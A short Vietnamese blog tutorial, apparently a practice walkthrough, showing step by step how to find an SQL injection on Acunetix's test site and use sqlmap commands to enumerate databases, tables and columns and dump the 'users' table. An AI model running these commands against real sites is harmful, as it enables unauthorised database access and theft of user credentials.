SQL Injection with sqlmap
Site: http://testphp.acunetix.com/

=======================
1. Check the URL.

Chèn thử dấu ‘ phía sau địa chỉ để kiểm tra lỗi: http://testphp.acunetix.com/search.php?test=query’

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/search.php on line 61

Có lỗi rồi. Mình sẽ dùng sqlmap để kiểm tra.

root@kali:~# sqlmap -u “http://testphp.acunetix.com/search.php?test=query” –dbs
=> Lệnh này mình dùng để kiểm tra xem trang web dùng Database tên gì (get database name)

Cái “information_schema” là DB mặc định của MySQL. Đừng quan tâm đến nó.
Cái “acuart” là tên của DB trang web, cái chúng ta cần.

2. Sau khi có tên DB, chúng ta sẽ get Table.

root@kali:~# sqlmap -u “http://testphp.acunetix.com/search.php?test=query” –tables D acuart

sqlmap lấy thông tin khá nhanh.

3. Get Columns.

root@kali:~# sqlmap -u “http://testphp.acunetix.com/search.php?test=query” –columns D acuart

4. Dump Data.

Có khá nhiều bảng, mình sẽ lấy dữ liệu của bảng tên là “users”. Trong bảng này thường có nhiều thông tin cần thiết cho việc tấn công.

root@kali:~# sqlmap -u “http://testphp.acunetix.com/search.php?test=query” –dump -D acuart -T users

Đến đây chúng ta đã có được thông tin cần thiết.

Leave a Comment

Your email address will not be published.